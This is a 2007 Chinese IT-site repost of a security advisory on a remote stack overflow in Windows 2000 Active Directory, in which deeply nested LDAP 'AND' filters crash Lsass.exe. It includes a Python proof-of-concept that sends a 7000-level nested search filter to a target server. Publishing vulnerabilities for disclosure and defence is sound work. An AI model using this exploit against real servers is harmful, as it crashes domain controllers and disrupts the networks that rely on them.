设为首页
加入收藏
帮助中心
首页 | 红盾通告 | 信息中心 | ASP技术 | 数据库 | 网页设计 | 网管专栏 | OICQ攻略 | 墨客频道 | 网站运营 |
当前位置:首页 >> 网管专栏 >> 操作系统 >> 正文
最新信息
·使用Microsoft Update升级…
·强制删除带点的特殊文件夹…
·window2003安全配制
·Windows 2003安全设置大全
·一般网站最容易发生的故障…
·windows server 2003服务器…
·能ping通但是无法上网的解…
·代理服务器架设技巧
·windows 2000/xp/2003开机…
·微软建议进行限制的程序
资料搜索
热点信息
·怎样删除系统服务项
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·手工关闭135端口(图)
·WindowsNT/2000/XP/2003/蓝…
·Win2003+IIS6.0+ASP.NET服…
·能ping通但是无法上网的解…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·代理服务器架设技巧
推荐信息
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·Win2003+IIS6.0+ASP.NET服…
·window2003安全配制
·win2003的一些设置
·Windows WEB服务器配置安全…


Google
 
Microsoft Windows 活动目录远程堆栈溢出缺陷
〖编辑:Cloudy | 浏览:人次〗

涉及程序:
Win2k Active Directory

描述:
Microsoft Windows 活动目录远程堆栈溢出缺陷

详细:
Windows Active Directory(活动目录)是Windows 2000结构的重要组件,是Microsoft提供的强大的目录服务系统。

Windows活动目录的LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,远程攻击者可利用此缺陷使Lsass.exe服务崩溃,触发缓冲区溢出。

通过活动目录提供的目录服务基于LDAP协议和并使用协议存储和获得Active目录对象。活动目录中使用LDAP 3的'search request'请求功能存在问题,攻击者如果构建超过1000个"AND"的请求,并发送给服务器,可导致触发堆栈溢出,使Lsass.exe服务崩溃,系统会在30秒内重新启动。

 

攻击方法:
CORE Security TechnologIEs Advisories (advisories@coresecurity.com)提供了如下测试方法:

下面是一段Python测试脚本:

------------------------------------
class ActiveDirectoryDos( Ldap ):


def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()


def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer


def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
return filterBuffer

 

def searchSub( self, filterBuffer ):


self.bindRequest()
self.searchRequest( filterBuffer )


def run(self, host = '', basedn = '', name = '' ):


# the Machine must not exist
machine_name = 'xaxax'


filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)


# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )


录入时间:2007-09-30 09:48:19 [打印本页] [关闭窗口] [返回顶部]
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。

Copyright © 2006-2014 0733168.Com Inc All Rights Reserved
关于我们 | 广告合作 | 联系我们 | 法律声明 | 友情链接 | 意见反馈
本站所收录信息、社区话题、及本站所做之广告均属其个人行为,与本站立场无关
湘ICP备06008436号